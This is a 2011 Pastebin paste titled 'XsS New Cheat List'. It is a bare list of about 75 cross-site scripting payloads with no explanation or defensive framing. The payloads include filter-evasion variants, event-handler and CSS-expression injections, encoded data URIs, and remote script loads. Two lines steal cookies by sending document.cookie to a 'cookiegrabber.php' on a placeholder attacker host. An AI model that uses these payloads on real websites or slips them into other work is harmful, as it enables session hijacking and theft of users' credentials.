API tools faq
paste
Advertisement
Guest User

XSS

a guest
Jun 27th, 2011
1,559
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 3.99 KB | None | 0 0
raw download clone embed print report
  1. /* XsS New Cheat List */
  2.  
  3.  
  4. <script>alert(1);</script>
  5.  
  6. <script>alert('XSS');</script>
  7.  
  8. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  9.  
  10. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  11.  
  12. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  13.  
  14. <script>alert(String.fromCharCode(88,83,83))</script>
  15.  
  16. <img src=foo.png onerror=alert(/xssed/) />
  17.  
  18. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  19.  
  20. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  21.  
  22. <marquee><script>alert('XSS')</script></marquee>
  23.  
  24. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  25.  
  26. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  27.  
  28. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  29.  
  30. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  31.  
  32. "><script>alert(0)</script>
  33.  
  34. <script src=http://yoursite.com/your_files.js></script>
  35.  
  36. </title><script>alert(/xss/)</script>
  37.  
  38. </textarea><script>alert(/xss/)</script>
  39.  
  40. <IMG LOWSRC=\"javascript:alert('XSS')\">
  41.  
  42. <IMG DYNSRC=\"javascript:alert('XSS')\">
  43.  
  44. <font style='color:expression(alert(document.cookie))'>
  45.  
  46. '); alert('XSS
  47.  
  48. <img src="javascript:alert('XSS')">
  49.  
  50. <script language="JavaScript">alert('XSS')</script>
  51.  
  52. [url=javascript:alert('XSS');]click me[/url]
  53.  
  54. <body onunload="javascript:alert('XSS');">
  55.  
  56. <body onLoad="alert('XSS');"
  57.  
  58. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  60. "/></a></><img src=1.gif onerror=alert(1)>
  61.  
  62. window.alert("Bonjour !");
  63.  
  64. <div style="x:expression((window.r==1)?'':eval('r=1;
  66. alert(String.fromCharCode(88,83,83));'))">
  67.  
  68. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  69.  
  70. "><script alert(String.fromCharCode(88,83,83))</script>
  71.  
  72. '>><marquee><h1>XSS</h1></marquee>
  73.  
  74. '">><script>alert('XSS')</script>
  75.  
  76. '">><marquee><h1>XSS</h1></marquee>
  77.  
  78. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  79.  
  80. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  81.  
  82. <script>var var = 1; alert(var)</script>
  83.  
  84. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  85.  
  86. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  87.  
  88. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  89.  
  90. " onfocus=alert(document.domain) "> <"
  92. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  93.  
  94. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  95.  
  96. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  97.  
  98. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  99.  
  100. <br size=\"&{alert('XSS')}\">
  101.  
  102. <scrscriptipt>alert(1)</scrscriptipt>
  103.  
  104. </br style=a:expression(alert())>
  105.  
  106. </script><script>alert(1)</script>
  107.  
  108. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  109.  
  110. [color=red width=expression(alert(123))][color]
  111.  
  112. <BASE HREF="javascript:alert('XSS');//">
  113.  
  114. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  115.  
  116. "></iframe><script>alert(123)</script>
  117.  
  118. <body onLoad="while(true) alert('XSS');">
  119.  
  120. '"></title><script>alert(1111)</script>
  121.  
  122. </textarea>'"><script>alert(document.cookie)</script>
  123.  
  124. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  125.  
  126. </script></script><<<<script><>>>><<<script>alert(123)</script>
  127.  
  128. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  129.  
  130. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  131.  
  132. '></select><script>alert(123)</script>
  133.  
  134. '>"><script src = 'http://www.site.com/XSS.js'></script>
  135.  
  136. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  137.  
  138. <SCRIPT>document.write("XSS");</SCRIPT>
  139.  
  140. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  141.  
  142. ='><script>alert("xss")</script>
  143.  
  144. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  145.  
  146. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  147.  
  148. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  149.  
  150. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  151.  
  152. src="http://www.site.com/XSS.js"></script>
  153.  
  154. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!